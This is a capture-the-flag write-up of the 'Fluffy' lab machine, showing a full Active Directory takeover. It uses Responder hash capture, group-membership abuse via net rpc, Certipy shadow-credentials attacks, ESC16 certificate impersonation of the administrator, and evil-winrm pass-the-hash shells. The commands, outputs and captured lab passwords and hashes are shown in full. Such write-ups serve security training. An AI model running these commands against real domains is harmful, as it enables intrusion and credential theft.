# Fluffy
## User
We are provided access to the user `j.fleischman:J0elTHEM4n1990!.`
Using netexec, we can quickly scan for share access to see where the user can read/write to.
```bash
netexec smb 10.10.11.69 -u j.fleischman -p J0elTHEM4n1990! --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
```
We can easily see that `IT` share looks suspicious - let's use `impacket-smbclient` to check it out.
```bash
impacket-smbclient j.fleischman@10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 .
drw-rw-rw- 0 Wed Jun 4 05:55:26 2025 ..
drw-rw-rw- 0 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw- 1827464 Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw- 0 Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw- 3225346 Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw- 169963 Sat May 17 22:31:07 2025 Upgrade_Notice.pdf
```
`Upgrade_notice.pdf` suggest to use a particular [cve](https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC) - cloning it and using `Responder` gives us a callback!.
```bash
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.85]
Responder IPv6 [dead:beef:4::1053]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-I3SM06WIZWL]
Responder Domain Name [ZKM3.LOCAL]
Responder DCE-RPC Port [45843]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:8db68836481e820b:E7CA67E6FA52D8CE078F9DD8C82BA9DC:01010000000000000004A0DC17D5DB01A234CB70BDB43EAB00000000020008005A004B004D00330001001E00570049004E002D004900330053004D0030003600570049005A0057004C0004003400570049004E002D004900330053004D0030003600570049005A0057004C002E005A004B004D0033002E004C004F00430041004C00030014005A004B004D0033002E004C004F00430041004C00050014005A004B004D0033002E004C004F00430041004C00070008000004A0DC17D5DB0106000400020000000800300030000000000000000100000000200000BCC9F77CEF3A5344C19CD6ACA6DC3E43C26C4CC18FA1518DF4CD129014BDCAAE0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380035000000000000000000
```
Cracking it gives us access to the user `p.agila:prometheusx-303`.
As always, use bloodhound to map out possible AD attack vectors.
Looks simple enough
`GenericAll` lets us basically do anything to the group `Service Accounts` - we can add the newly obtained `p.agila` to it with `net rpc`
```bash
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc
```
`GenericWrite` lets us do either a targeted kerberoasting attack or shadow credentials attack (requires ADCS). Let's opt for shadow credentials as there is the presence of `ca_svc` here which suggest the use of ADCS.
```bash
certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip 10.10.11.69 -account 'winrm_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c'
[*] Adding Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
```
{% code overflow="wrap" %}
```bash
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ls
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../
*Evil-WinRM* PS C:\Users\winrm_svc> ls
Directory: C:\Users\winrm_svc
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/17/2025 11:56 AM Desktop
d-r--- 5/19/2025 9:15 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\winrm_svc> cd Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/3/2025 10:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
```
{% endcode %}
## Root
`winrm_svc` has `GenericWrite` writes to the users `ldap_svc` and `ca_svc`which means we can perform the shadow credentials attack again to retrieve their respective NThash.
{% code overflow="wrap" %}
```bash
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ldap_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7'
[*] Adding Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f538f689-fb88-05f3-c323-29489d51470c'
[*] Adding Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```
{% endcode %}
`ca_svc` is part of the `Cert Publisher` Group which when queried with `certipy`, is vulnerable to [ESC16](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally)
Looking at the documentation, we will go with scenario A as we fufill the criteria from the previous owned users.
{% hint style="info" %}
Attacker (`winrm_svc@fluffy.htb`) has `GenericWrite` permission over a "victim" account (`ca_svc@fluffy.htb`). The `victim` account can enroll in *any suitable client authentication template* (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is `administrator@fluffy.htb`.
{% endhint %}
First, we need to set the upn of our victim account `ca_svc` to `administrator@fluffy.htb`
```bash
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'administrator@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator@fluffy.htb
[*] Successfully updated 'ca_svc'
```
Next, we need to request for the certificate with the associated spn using the victim account `ca_svc`, specifying a template such as `User`
```bash
certipy-ad -debug req -k -dc-host 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: '10.10.11.69'
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.fluffy.htb' at '192.168.125.2'
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/certipy/lib/target.py", line 442, in resolve
answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 1306, in resolve
(request, answer) = resolution.next_request()
~~~~~~~~~~~~~~~~~~~~~~~^^
File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 750, in next_request
raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: DC01.fluffy.htb.
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.fluffy.htb'
[+] Got TGS for 'HOST/DC01.fluffy.htb'
[+] Trying to connect to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[*] Request ID is 17
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```
Lastly, we need to revert the upn before authenticating as `Administrator`
```bash
certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
certipy-ad auth -pfx administrator@fluffy.htb -dc-ip 10.10.11.69 -username 'administrator' -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@fluffy.htb'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat *
```
